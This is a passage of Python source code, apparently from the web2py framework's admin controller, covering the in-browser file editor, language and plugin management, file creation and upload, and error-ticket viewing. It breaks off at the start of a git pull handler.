offset = 0
highlight = {'start': start, 'end': start +
offset + 1, 'lineno': e.lineno, 'offset': offset}
try:
ex_name = e.__class__.__name__
except:
ex_name = 'unknown exception!'
response.flash = DIV(T('failed to compile file because:'), BR(),
B(ex_name), ' ' + T('at line %s', e.lineno),
offset and ' ' +
T('at char %s', offset) or '',
PRE(repr(e)))
if data_or_revert and request.args[1] == 'modules':
# Lets try to reload the modules
try:
mopath = '.'.join(request.args[2:])[:-3]
exec('import applications.%s.modules.%s' % (
request.args[0], mopath))
reload(sys.modules['applications.%s.modules.%s'
% (request.args[0], mopath)])
except Exception as e:
response.flash = DIV(
T('failed to reload module because:'), PRE(repr(e)))
edit_controller = None
editviewlinks = None
view_link = None
if filetype == 'html' and len(request.args) >= 3:
cfilename = os.path.join(request.args[0], 'controllers',
request.args[2] + '.py')
if os.path.exists(apath(cfilename, r=request)):
edit_controller = URL('edit', args=[cfilename.replace(os.sep, "/")])
view = request.args[3].replace('.html', '')
view_link = URL(request.args[0], request.args[2], view)
elif filetype == 'python' and request.args[1] == 'controllers':
# it's a controller file.
# Create links to all of the associated view files.
app = get_app()
viewname = os.path.splitext(request.args[2])[0]
viewpath = os.path.join(app, 'views', viewname)
aviewpath = apath(viewpath, r=request)
viewlist = []
if os.path.exists(aviewpath):
if os.path.isdir(aviewpath):
viewlist = glob(os.path.join(aviewpath, '*.html'))
elif os.path.exists(aviewpath + '.html'):
viewlist.append(aviewpath + '.html')
if len(viewlist):
editviewlinks = []
for v in sorted(viewlist):
vf = os.path.split(v)[-1]
vargs = "/".join([viewpath.replace(os.sep, "/"), vf])
editviewlinks.append(A(vf.split(".")[0],
_class="editor_filelink",
_href=URL('edit', args=[vargs])))
if len(request.args) > 2 and request.args[1] == 'controllers':
controller = (request.args[2])[:-3]
try:
functions = find_exposed_functions(data)
functions = functions and sorted(functions) or []
except SyntaxError as err:
functions = ['SyntaxError:Line:%d' % err.lineno]
else:
(controller, functions) = (None, None)
if 'from_ajax' in request.vars:
return response.json({'file_hash': file_hash, 'saved_on': saved_on, 'functions': functions, 'controller': controller, 'application': request.args[0], 'highlight': highlight})
else:
file_details = dict(app=request.args[0],
lineno=request.vars.lineno or 1,
editor_settings=preferences,
filename=filename,
realfilename=realfilename,
filetype=filetype,
data=data,
edit_controller=edit_controller,
file_hash=file_hash,
saved_on=saved_on,
controller=controller,
functions=functions,
view_link=view_link,
editviewlinks=editviewlinks,
id=IS_SLUG()(filename)[0],
force=True if (request.vars.restore or
request.vars.revert) else False)
plain_html = response.render('default/edit_js.html', file_details)
file_details['plain_html'] = plain_html
if is_mobile:
return response.render('default.mobile/edit.html',
file_details, editor_settings=preferences)
else:
return response.json(file_details)
def todolist():
""" Returns all TODO of the requested app
"""
app = request.vars.app or ''
app_path = apath('%(app)s' % {'app': app}, r=request)
dirs = ['models', 'controllers', 'modules', 'private']
def listfiles(app, dir, regexp='.*\.py$'):
files = sorted(listdir(apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request), regexp))
files = [x.replace(os.path.sep, '/') for x in files if not x.endswith('.bak')]
return files
pattern = '#\s*(todo)+\s+(.*)'
regex = re.compile(pattern, re.IGNORECASE)
output = []
for d in dirs:
for f in listfiles(app, d):
matches = []
filename = apath(os.path.join(app, d, f), r=request)
with safe_open(filename, 'r') as f_s:
src = f_s.read()
for m in regex.finditer(src):
start = m.start()
lineno = src.count('\n', 0, start) + 1
matches.append({'text': m.group(0), 'lineno': lineno})
if len(matches) != 0:
output.append({'filename': f, 'matches': matches, 'dir': d})
return {'todo': output, 'app': app}
def editor_sessions():
config = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor_sessions', default_values={})
preferences = config.read()
if request.vars.session_name and request.vars.files:
session_name = request.vars.session_name
files = request.vars.files
preferences.update({session_name: ','.join(files)})
if config.save(preferences.items()):
response.headers["web2py-component-flash"] = T('Session saved correctly')
else:
response.headers["web2py-component-flash"] = T('Session saved on session only')
return response.render('default/editor_sessions.html', {'editor_sessions': preferences})
def resolve():
"""
"""
filename = '/'.join(request.args)
# ## check if file is not there
path = apath(filename, r=request)
a = safe_read(path).split('\n')
try:
b = safe_read(path + '.1').split('\n')
except IOError:
session.flash = 'Other file, no longer there'
redirect(URL('edit', args=request.args))
d = difflib.ndiff(a, b)
def leading(line):
""" """
# TODO: we really need to comment this
z = ''
for (k, c) in enumerate(line):
if c == ' ':
z += ' '
elif c == ' \t':
z += ' '
elif k == 0 and c == '?':
pass
else:
break
return XML(z)
def getclass(item):
""" Determine item class """
operators = {' ': 'normal', '+': 'plus', '-': 'minus'}
return operators[item[0]]
if request.vars:
c = '\n'.join([item[2:].rstrip() for (i, item) in enumerate(d) if item[0]
== ' ' or 'line%i' % i in request.vars])
safe_write(path, c)
session.flash = 'files merged'
redirect(URL('edit', args=request.args))
else:
# Making the short circuit compatible with <= python2.4
gen_data = lambda index, item: not item[:1] in ['+', '-'] and "" \
or INPUT(_type='checkbox',
_name='line%i' % index,
value=item[0] == '+')
diff = TABLE(*[TR(TD(gen_data(i, item)),
TD(item[0]),
TD(leading(item[2:]),
TT(item[2:].rstrip())),
_class=getclass(item))
for (i, item) in enumerate(d) if item[0] != '?'])
return dict(diff=diff, filename=filename)
def edit_language():
""" Edit language file """
app = get_app()
filename = '/'.join(request.args)
response.title = request.args[-1]
strings = read_dict(apath(filename, r=request))
if '__corrupted__' in strings:
form = SPAN(strings['__corrupted__'], _class='error')
return dict(filename=filename, form=form)
keys = sorted(strings.keys(), key=lambda x: to_native(x).lower())
rows = []
rows.append(H2(T('Original/Translation')))
for key in keys:
name = md5_hash(key)
s = strings[key]
(prefix, sep, key) = key.partition('\x01')
if sep:
prefix = SPAN(prefix + ': ', _class='tm_ftag')
k = key
else:
(k, prefix) = (prefix, '')
_class = 'untranslated' if k == s else 'translated'
if len(s) <= 40:
elem = INPUT(_type='text', _name=name, value=s,
_size=70, _class=_class)
else:
elem = TEXTAREA(_name=name, value=s, _cols=70,
_rows=5, _class=_class)
# Making the short circuit compatible with <= python2.4
k = (s != k) and k or B(k)
new_row = DIV(LABEL(prefix, k, _style="font-weight:normal;"),
CAT(elem, '\n', TAG.BUTTON(
T('delete'),
_onclick='return delkey("%s")' % name,
_class='btn')), _id=name, _class='span6 well well-small')
rows.append(DIV(new_row, _class="row-fluid"))
rows.append(DIV(INPUT(_type='submit', _value=T('update'), _class="btn btn-primary"), _class='controls'))
form = FORM(*rows)
if form.accepts(request.vars, keepvalues=True):
strs = dict()
for key in keys:
name = md5_hash(key)
if form.vars[name] == chr(127):
continue
strs[key] = form.vars[name]
write_dict(apath(filename, r=request), strs)
session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
redirect(URL(r=request, args=request.args))
return dict(app=request.args[0], filename=filename, form=form)
def edit_plurals():
""" Edit plurals file """
app = get_app()
filename = '/'.join(request.args)
plurals = read_plural_dict(
apath(filename, r=request)) # plural forms dictionary
nplurals = int(request.vars.nplurals) - 1 # plural forms quantity
xnplurals = xrange(nplurals)
if '__corrupted__' in plurals:
# show error message and exit
form = SPAN(plurals['__corrupted__'], _class='error')
return dict(filename=filename, form=form)
keys = sorted(plurals.keys(), lambda x, y: cmp(
unicode(x, 'utf-8').lower(), unicode(y, 'utf-8').lower()))
tab_rows = []
for key in keys:
name = md5_hash(key)
forms = plurals[key]
if len(forms) < nplurals:
forms.extend(None for i in xrange(nplurals - len(forms)))
tab_col1 = DIV(CAT(LABEL(T("Singular Form")), B(key,
_class='fake-input')))
tab_inputs = [SPAN(LABEL(T("Plural Form #%s", n + 1)), INPUT(_type='text', _name=name + '_' + str(n), value=forms[n], _size=20), _class='span6') for n in xnplurals]
tab_col2 = DIV(CAT(*tab_inputs))
tab_col3 = DIV(CAT(LABEL(XML(' ')), TAG.BUTTON(T('delete'), _onclick='return delkey("%s")' % name, _class='btn'), _class='span6'))
tab_row = DIV(DIV(tab_col1, '\n', tab_col2, '\n', tab_col3, _class='well well-small'), _id=name, _class='row-fluid tab_row')
tab_rows.append(tab_row)
tab_rows.append(DIV(TAG['button'](T('update'), _type='submit',
_class='btn btn-primary'),
_class='controls'))
tab_container = DIV(*tab_rows, **dict(_class="row-fluid"))
form = FORM(tab_container)
if form.accepts(request.vars, keepvalues=True):
new_plurals = dict()
for key in keys:
name = md5_hash(key)
if form.vars[name + '_0'] == chr(127):
continue
new_plurals[key] = [form.vars[name + '_' + str(n)]
for n in xnplurals]
write_plural_dict(apath(filename, r=request), new_plurals)
session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
redirect(URL(r=request, args=request.args, vars=dict(
nplurals=request.vars.nplurals)))
return dict(app=request.args[0], filename=filename, form=form)
def about():
""" Read about info """
app = get_app()
# ## check if file is not there
about = safe_read(apath('%s/ABOUT' % app, r=request))
license = safe_read(apath('%s/LICENSE' % app, r=request))
return dict(app=app, about=MARKMIN(about), license=MARKMIN(license), progress=report_progress(app))
def design():
""" Application design handler """
app = get_app()
if not response.flash and app == request.application:
msg = T('ATTENTION: you cannot edit the running application!')
response.flash = msg
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
if request.vars.pluginfile is not None and not isinstance(request.vars.pluginfile, str):
filename = os.path.basename(request.vars.pluginfile.filename)
if plugin_install(app, request.vars.pluginfile.file,
request, filename):
session.flash = T('new plugin installed')
redirect(URL('design', args=app))
else:
session.flash = \
T('unable to install plugin "%s"', filename)
redirect(URL(r=request, args=app))
elif isinstance(request.vars.pluginfile, str):
session.flash = T('plugin not specified')
redirect(URL(r=request, args=app))
# If we have only pyc files it means that
# we cannot design
if os.path.exists(apath('%s/compiled' % app, r=request)):
session.flash = \
T('application is compiled and cannot be designed')
redirect(URL('site'))
# Get all models
models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
models = [x.replace('\\', '/') for x in models]
defines = {}
for m in models:
data = safe_read(apath('%s/models/%s' % (app, m), r=request))
defines[m] = re.findall(REGEX_DEFINE_TABLE, data, re.MULTILINE)
defines[m].sort()
# Get all controllers
controllers = sorted(
listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
controllers = [x.replace('\\', '/') for x in controllers]
functions = {}
for c in controllers:
data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
try:
items = find_exposed_functions(data)
functions[c] = items and sorted(items) or []
except SyntaxError as err:
functions[c] = ['SyntaxError:Line:%d' % err.lineno]
# Get all views
views = sorted(
listdir(apath('%s/views/' % app, r=request), '[\w/\-]+(\.\w+)+$'))
views = [x.replace('\\', '/') for x in views if not x.endswith('.bak')]
extend = {}
include = {}
for c in views:
data = safe_read(apath('%s/views/%s' % (app, c), r=request))
items = re.findall(REGEX_EXTEND, data, re.MULTILINE)
if items:
extend[c] = items[0][1]
items = re.findall(REGEX_INCLUDE, data)
include[c] = [i[1] for i in items]
# Get all modules
modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
modules = modules = [x.replace('\\', '/') for x in modules]
modules.sort()
# Get all private files
privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
privates = [x.replace('\\', '/') for x in privates]
privates.sort()
# Get all static files
statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
maxnum=MAXNFILES)
statics = [x.replace(os.path.sep, '/') for x in statics]
statics.sort()
# Get all languages
langpath = os.path.join(apath(app, r=request), 'languages')
languages = dict([(lang, info) for lang, info
in iteritems(read_possible_languages(langpath))
if info[2] != 0]) # info[2] is langfile_mtime:
# get only existed files
# Get crontab
cronfolder = apath('%s/cron' % app, r=request)
crontab = apath('%s/cron/crontab' % app, r=request)
if not is_gae:
if not os.path.exists(cronfolder):
os.mkdir(cronfolder)
if not os.path.exists(crontab):
safe_write(crontab, '#crontab')
plugins = []
def filter_plugins(items, plugins):
plugins += [item[7:].split('/')[0].split(
'.')[0] for item in items if item.startswith('plugin_')]
plugins[:] = list(set(plugins))
plugins.sort()
return [item for item in items if not item.startswith('plugin_')]
return dict(app=app,
models=filter_plugins(models, plugins),
defines=defines,
controllers=filter_plugins(controllers, plugins),
functions=functions,
views=filter_plugins(views, plugins),
modules=filter_plugins(modules, plugins),
extend=extend,
include=include,
privates=filter_plugins(privates, plugins),
statics=filter_plugins(statics, plugins),
languages=languages,
crontab=crontab,
plugins=plugins)
def delete_plugin():
""" Object delete handler """
app = request.args(0)
plugin = request.args(1)
plugin_name = 'plugin_' + plugin
dialog = FORM.confirm(
T('Delete'),
{T('Cancel'): URL('design', args=app)})
if dialog.accepted:
try:
for folder in ['models', 'views', 'controllers', 'static', 'modules', 'private']:
path = os.path.join(apath(app, r=request), folder)
for item in os.listdir(path):
if item.rsplit('.', 1)[0] == plugin_name:
filename = os.path.join(path, item)
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.unlink(filename)
session.flash = T('plugin "%(plugin)s" deleted',
dict(plugin=plugin))
except Exception:
session.flash = T('unable to delete file plugin "%(plugin)s"',
dict(plugin=plugin))
redirect(URL('design', args=request.args(0), anchor=request.vars.id2))
return dict(dialog=dialog, plugin=plugin)
def plugin():
""" Application design handler """
app = get_app()
plugin = request.args(1)
if not response.flash and app == request.application:
msg = T('ATTENTION: you cannot edit the running application!')
response.flash = msg
# If we have only pyc files it means that
# we cannot design
if os.path.exists(apath('%s/compiled' % app, r=request)):
session.flash = \
T('application is compiled and cannot be designed')
redirect(URL('site'))
# Get all models
models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
models = [x.replace('\\', '/') for x in models]
defines = {}
for m in models:
data = safe_read(apath('%s/models/%s' % (app, m), r=request))
defines[m] = re.findall(REGEX_DEFINE_TABLE, data, re.MULTILINE)
defines[m].sort()
# Get all controllers
controllers = sorted(
listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
controllers = [x.replace('\\', '/') for x in controllers]
functions = {}
for c in controllers:
data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
try:
items = find_exposed_functions(data)
functions[c] = items and sorted(items) or []
except SyntaxError as err:
functions[c] = ['SyntaxError:Line:%d' % err.lineno]
# Get all views
views = sorted(
listdir(apath('%s/views/' % app, r=request), '[\w/\-]+\.\w+$'))
views = [x.replace('\\', '/') for x in views]
extend = {}
include = {}
for c in views:
data = safe_read(apath('%s/views/%s' % (app, c), r=request))
items = re.findall(REGEX_EXTEND, data, re.MULTILINE)
if items:
extend[c] = items[0][1]
items = re.findall(REGEX_INCLUDE, data)
include[c] = [i[1] for i in items]
# Get all modules
modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
modules = modules = [x.replace('\\', '/') for x in modules]
modules.sort()
# Get all private files
privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
privates = [x.replace('\\', '/') for x in privates]
privates.sort()
# Get all static files
statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
maxnum=MAXNFILES)
statics = [x.replace(os.path.sep, '/') for x in statics]
statics.sort()
# Get all languages
languages = sorted([lang + '.py' for lang, info in
iteritems(T.get_possible_languages_info())
if info[2] != 0]) # info[2] is langfile_mtime:
# get only existed files
# Get crontab
crontab = apath('%s/cron/crontab' % app, r=request)
if not os.path.exists(crontab):
safe_write(crontab, '#crontab')
def filter_plugins(items):
regex = re.compile('^plugin_' + plugin + '(/.*|\..*)?$')
return [item for item in items if item and regex.match(item)]
return dict(app=app,
models=filter_plugins(models),
defines=defines,
controllers=filter_plugins(controllers),
functions=functions,
views=filter_plugins(views),
modules=filter_plugins(modules),
extend=extend,
include=include,
privates=filter_plugins(privates),
statics=filter_plugins(statics),
languages=languages,
crontab=crontab)
def create_file():
""" Create files handler """
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
anchor = '#' + request.vars.id if request.vars.id else ''
if request.vars.app:
app = get_app(request.vars.app)
path = abspath(request.vars.location)
else:
if request.vars.dir:
request.vars.location += request.vars.dir + '/'
app = get_app(name=request.vars.location.split('/')[0])
path = apath(request.vars.location, r=request)
filename = re.sub('[^\w./-]+', '_', request.vars.filename)
if path[-7:] == '/rules/':
# Handle plural rules files
if len(filename) == 0:
raise SyntaxError
if not filename[-3:] == '.py':
filename += '.py'
lang = re.match('^plural_rules-(.*)\.py$', filename).group(1)
langinfo = read_possible_languages(apath(app, r=request))[lang]
text = dedent("""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Plural-Forms for %(lang)s (%(langname)s)
nplurals=2 # for example, English language has 2 forms:
# 1 singular and 1 plural
# Determine plural_id for number *n* as sequence of positive
# integers: 0,1,...
# NOTE! For singular form ALWAYS return plural_id = 0
get_plural_id = lambda n: int(n != 1)
# Construct and return plural form of *word* using
# *plural_id* (which ALWAYS>0). This function will be executed
# for words (or phrases) not found in plural_dict dictionary.
# By default this function simply returns word in singular:
construct_plural_form = lambda word, plural_id: word
""")[1:] % dict(lang=langinfo[0], langname=langinfo[1])
elif path[-11:] == '/languages/':
# Handle language files
if len(filename) == 0:
raise SyntaxError
if not filename[-3:] == '.py':
filename += '.py'
path = os.path.join(apath(app, r=request), 'languages', filename)
if not os.path.exists(path):
safe_write(path, '')
# create language xx[-yy].py file:
findT(apath(app, r=request), filename[:-3])
session.flash = T('language file "%(filename)s" created/updated',
dict(filename=filename))
redirect(request.vars.sender + anchor)
elif path[-8:] == '/models/':
# Handle python models
if not filename[-3:] == '.py':
filename += '.py'
if len(filename) == 3:
raise SyntaxError
text = '# -*- coding: utf-8 -*-\n'
elif path[-13:] == '/controllers/':
# Handle python controllers
if not filename[-3:] == '.py':
filename += '.py'
if len(filename) == 3:
raise SyntaxError
text = '# -*- coding: utf-8 -*-\n# %s\ndef index(): return dict(message="hello from %s")'
text = text % (T('try something like'), filename)
elif path[-7:] == '/views/':
if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
# Handle template (html) views
if filename.find('.') < 0:
filename += '.html'
extension = filename.split('.')[-1].lower()
if len(filename) == 5:
raise SyntaxError
msg = T(
'This is the %(filename)s template', dict(filename=filename))
if extension == 'html':
text = dedent("""
{{extend 'layout.html'}}
<h1>%s</h1>
{{=BEAUTIFY(response._vars)}}""" % msg)[1:]
else:
generic = os.path.join(path, 'generic.' + extension)
if os.path.exists(generic):
text = read_file(generic)
else:
text = ''
elif path[-9:] == '/modules/':
if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
# Handle python module files
if not filename[-3:] == '.py':
filename += '.py'
if len(filename) == 3:
raise SyntaxError
text = dedent("""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from gluon import *\n""")[1:]
elif (path[-8:] == '/static/') or (path[-9:] == '/private/'):
if (request.vars.plugin and
not filename.startswith('plugin_%s/' % request.vars.plugin)):
filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
text = ''
else:
redirect(request.vars.sender + anchor)
full_filename = os.path.join(path, filename)
dirpath = os.path.dirname(full_filename)
if not os.path.exists(dirpath):
os.makedirs(dirpath)
if os.path.exists(full_filename):
raise SyntaxError
safe_write(full_filename, text)
log_progress(app, 'CREATE', filename)
if request.vars.dir:
result = T('file "%(filename)s" created',
dict(filename=full_filename[len(path):]))
else:
session.flash = T('file "%(filename)s" created',
dict(filename=full_filename[len(path):]))
vars = {}
if request.vars.id:
vars['id'] = request.vars.id
if request.vars.app:
vars['app'] = request.vars.app
redirect(URL('edit',
args=[os.path.join(request.vars.location, filename)], vars=vars))
except Exception as e:
if not isinstance(e, HTTP):
session.flash = T('cannot create file')
if request.vars.dir:
response.flash = result
response.headers['web2py-component-content'] = 'append'
response.headers['web2py-component-command'] = "%s %s %s" % (
"$.web2py.invalidate('#files_menu');",
"load_file('%s');" % URL('edit', args=[app, request.vars.dir, filename]),
"$.web2py.enableElement($('#form form').find($.web2py.formInputClickSelector));")
return ''
else:
redirect(request.vars.sender + anchor)
def listfiles(app, dir, regexp='.*\.py$'):
files = sorted(
listdir(apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request), regexp))
files = [x.replace('\\', '/') for x in files if not x.endswith('.bak')]
return files
def editfile(path, file, vars={}, app=None):
args = (path, file) if 'app' in vars else (app, path, file)
url = URL('edit', args=args, vars=vars)
return A(file, _class='editor_filelink', _href=url, _style='word-wrap: nowrap;')
def files_menu():
app = request.vars.app or 'welcome'
dirs = [{'name': 'models', 'reg': '.*\.py$'},
{'name': 'controllers', 'reg': '.*\.py$'},
{'name': 'views', 'reg': '[\w/\-]+(\.\w+)+$'},
{'name': 'modules', 'reg': '.*\.py$'},
{'name': 'static', 'reg': '[^\.#].*'},
{'name': 'private', 'reg': '.*\.py$'}]
result_files = []
for dir in dirs:
result_files.append(TAG[''](LI(dir['name'], _class="nav-header component", _onclick="collapse('" + dir['name'] + "_files');"),
LI(UL(*[LI(editfile(dir['name'], f, dict(id=dir['name'] + f.replace('.', '__')), app), _style="overflow:hidden", _id=dir['name'] + "__" + f.replace('.', '__'))
for f in listfiles(app, dir['name'], regexp=dir['reg'])],
_class="nav nav-list small-font"),
_id=dir['name'] + '_files', _style="display: none;")))
return dict(result_files=result_files)
def upload_file():
""" File uploading handler """
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
filename = None
app = get_app(name=request.vars.location.split('/')[0])
path = apath(request.vars.location, r=request)
if request.vars.filename:
filename = re.sub('[^\w\./]+', '_', request.vars.filename)
else:
filename = os.path.split(request.vars.file.filename)[-1]
if path[-8:] == '/models/' and not filename[-3:] == '.py':
filename += '.py'
if path[-9:] == '/modules/' and not filename[-3:] == '.py':
filename += '.py'
if path[-13:] == '/controllers/' and not filename[-3:] == '.py':
filename += '.py'
if path[-7:] == '/views/' and not filename[-5:] == '.html':
filename += '.html'
if path[-11:] == '/languages/' and not filename[-3:] == '.py':
filename += '.py'
filename = os.path.join(path, filename)
dirpath = os.path.dirname(filename)
if not os.path.exists(dirpath):
os.makedirs(dirpath)
data = request.vars.file.file.read()
lineno = count_lines(data)
safe_write(filename, data, 'wb')
log_progress(app, 'UPLOAD', filename, lineno)
session.flash = T('file "%(filename)s" uploaded',
dict(filename=filename[len(path):]))
except Exception:
if filename:
d = dict(filename=filename[len(path):])
else:
d = dict(filename='unknown')
session.flash = T('cannot upload file "%(filename)s"', d)
redirect(request.vars.sender)
def errors():
""" Error handler """
import operator
import os
import hashlib
app = get_app()
if is_gae:
method = 'dbold' if ('old' in
(request.args(1) or '')) else 'dbnew'
else:
method = request.args(1) or 'new'
db_ready = {}
db_ready['status'] = get_ticket_storage(app)
db_ready['errmessage'] = T(
"No ticket_storage.txt found under /private folder")
db_ready['errlink'] = "http://web2py.com/books/default/chapter/29/13#Collecting-tickets"
if method == 'new':
errors_path = apath('%s/errors' % app, r=request)
delete_hashes = []
for item in request.vars:
if item[:7] == 'delete_':
delete_hashes.append(item[7:])
hash2error = dict()
for fn in listdir(errors_path, '^[a-fA-F0-9.\-]+$'):
fullpath = os.path.join(errors_path, fn)
if not os.path.isfile(fullpath):
continue
try:
fullpath_file = safe_open(fullpath, 'rb')
try:
error = pickle.load(fullpath_file)
finally:
fullpath_file.close()
except IOError:
continue
except EOFError:
continue
hash = hashlib.md5(to_bytes(error['traceback'])).hexdigest()
if hash in delete_hashes:
os.unlink(fullpath)
else:
try:
hash2error[hash]['count'] += 1
except KeyError:
error_lines = error['traceback'].split("\n")
last_line = error_lines[-2] if len(error_lines) > 1 else 'unknown'
error_causer = os.path.split(error['layer'])[1]
hash2error[hash] = dict(count=1, pickel=error,
causer=error_causer,
last_line=last_line,
hash=hash, ticket=fn)
decorated = [(x['count'], x) for x in hash2error.values()]
decorated.sort(key=operator.itemgetter(0), reverse=True)
return dict(errors=[x[1] for x in decorated], app=app, method=method, db_ready=db_ready)
elif method == 'dbnew':
errors_path = apath('%s/errors' % app, r=request)
tk_db, tk_table = get_ticket_storage(app)
delete_hashes = []
for item in request.vars:
if item[:7] == 'delete_':
delete_hashes.append(item[7:])
hash2error = dict()
for fn in tk_db(tk_table.id > 0).select():
try:
error = pickle.loads(fn.ticket_data)
hash = hashlib.md5(error['traceback']).hexdigest()
if hash in delete_hashes:
tk_db(tk_table.id == fn.id).delete()
tk_db.commit()
else:
try:
hash2error[hash]['count'] += 1
except KeyError:
error_lines = error['traceback'].split("\n")
last_line = error_lines[-2]
error_causer = os.path.split(error['layer'])[1]
hash2error[hash] = dict(count=1,
pickel=error, causer=error_causer,
last_line=last_line, hash=hash,
ticket=fn.ticket_id)
except AttributeError as e:
tk_db(tk_table.id == fn.id).delete()
tk_db.commit()
decorated = [(x['count'], x) for x in hash2error.values()]
decorated.sort(key=operator.itemgetter(0), reverse=True)
return dict(errors=[x[1] for x in decorated], app=app,
method=method, db_ready=db_ready)
elif method == 'dbold':
tk_db, tk_table = get_ticket_storage(app)
for item in request.vars:
if item[:7] == 'delete_':
tk_db(tk_table.ticket_id == item[7:]).delete()
tk_db.commit()
tickets_ = tk_db(tk_table.id > 0).select(tk_table.ticket_id,
tk_table.created_datetime,
orderby=~tk_table.created_datetime)
tickets = [row.ticket_id for row in tickets_]
times = dict([(row.ticket_id, row.created_datetime) for
row in tickets_])
return dict(app=app, tickets=tickets, method=method,
times=times, db_ready=db_ready)
else:
for item in request.vars:
# delete_all rows doesn't contain any ticket
# Remove anything else as requested
if item[:7] == 'delete_' and (not item == "delete_all}"):
os.unlink(apath('%s/errors/%s' % (app, item[7:]), r=request))
func = lambda p: os.stat(apath('%s/errors/%s' %
(app, p), r=request)).st_mtime
tickets = sorted(
listdir(apath('%s/errors/' % app, r=request), '^\w.*'),
key=func,
reverse=True)
return dict(app=app, tickets=tickets, method=method, db_ready=db_ready)
def get_ticket_storage(app):
private_folder = apath('%s/private' % app, r=request)
ticket_file = os.path.join(private_folder, 'ticket_storage.txt')
if os.path.exists(ticket_file):
db_string = safe_read(ticket_file)
db_string = db_string.strip().replace('\r', '').replace('\n', '')
elif is_gae:
# use Datastore as fallback if there is no ticket_file
db_string = "google:datastore"
else:
return False
tickets_table = 'web2py_ticket'
tablename = tickets_table + '_' + app
db_path = apath('%s/databases' % app, r=request)
ticketsdb = DAL(db_string, folder=db_path, auto_import=True)
if not ticketsdb.get(tablename):
table = ticketsdb.define_table(
tablename,
Field('ticket_id', length=100),
Field('ticket_data', 'text'),
Field('created_datetime', 'datetime'),
)
return ticketsdb, ticketsdb.get(tablename)
def make_link(path):
""" Create a link from a path """
tryFile = path.replace('\\', '/')
if os.path.isabs(tryFile) and os.path.isfile(tryFile):
(folder, filename) = os.path.split(tryFile)
(base, ext) = os.path.splitext(filename)
app = get_app()
editable = {'controllers': '.py', 'models': '.py', 'views': '.html'}
for key in editable.keys():
check_extension = folder.endswith("%s/%s" % (app, key))
if ext.lower() == editable[key] and check_extension:
return to_native(A('"' + tryFile + '"',
_href=URL(r=request,
f='edit/%s/%s/%s' % (app, key, filename))).xml())
return ''
def make_links(traceback):
""" Make links using the given traceback """
lwords = traceback.split('"')
# Making the short circuit compatible with <= python2.4
result = (len(lwords) != 0) and lwords[0] or ''
i = 1
while i < len(lwords):
link = make_link(lwords[i])
if link == '':
result += '"' + lwords[i]
else:
result += link
if i + 1 < len(lwords):
result += lwords[i + 1]
i = i + 1
i = i + 1
return result
class TRACEBACK(object):
""" Generate the traceback """
def __init__(self, text):
""" TRACEBACK constructor """
self.s = make_links(CODE(text).xml())
def xml(self):
""" Returns the xml """
return self.s
def ticket():
""" Ticket handler """
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
app = get_app()
myversion = request.env.web2py_version
ticket = request.args[1]
e = RestrictedError()
e.load(request, app, ticket)
return dict(app=app,
ticket=ticket,
output=e.output,
traceback=(e.traceback and TRACEBACK(e.traceback)),
snapshot=e.snapshot,
code=e.code,
layer=e.layer,
myversion=myversion)
def ticketdb():
""" Ticket handler """
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
app = get_app()
myversion = request.env.web2py_version
ticket = request.args[1]
e = RestrictedError()
request.tickets_db = get_ticket_storage(app)[0]
e.load(request, app, ticket)
response.view = 'default/ticket.html'
return dict(app=app,
ticket=ticket,
output=e.output,
traceback=(e.traceback and TRACEBACK(e.traceback)),
snapshot=e.snapshot,
code=e.code,
layer=e.layer,
myversion=myversion)
def error():
""" Generate a ticket (for testing) """
raise RuntimeError('admin ticket generator at your service')
def update_languages():
""" Update available languages """
app = get_app()
update_all_languages(apath(app, r=request))
session.flash = T('Language files (static strings) updated')
redirect(URL('design', args=app, anchor='languages'))
def user():
if MULTI_USER_MODE:
if not db(db.auth_user).count():
auth.settings.registration_requires_approval = False
return dict(form=auth())
else:
return dict(form=T("Disabled"))
def reload_routes():
""" Reload routes.py """
gluon.rewrite.load()
redirect(URL('site'))
def manage_students():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
db.auth_user.registration_key.writable = True
grid = SQLFORM.grid(db.auth_user)
return locals()
def bulk_register():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
form = SQLFORM.factory(Field('emails', 'text'))
if form.process().accepted:
emails = [x.strip() for x in form.vars.emails.split('\n') if x.strip()]
n = 0
for email in emails:
if not db.auth_user(email=email):
n += db.auth_user.insert(email=email) and 1 or 0
session.flash = T('%s students registered', n)
redirect(URL('site'))
return locals()
# Begin experimental stuff need fixes:
# 1) should run in its own process - cannot os.chdir
# 2) should not prompt user at console
# 3) should give option to force commit and not reuqire manual merge
def git_pull():
""" Git Pull handler """
app = get_app()
if not have_git:
session.flash = GIT_MISSING
redirect(URL('site'))
dialog = FORM.confirm(T('Pull'),
{T('Cancel'): URL('site')})
if dialog.accepted:
try:
repo = git.Repo(os.path.join(apath(r=request), app))
origin = repo.remotes.origin
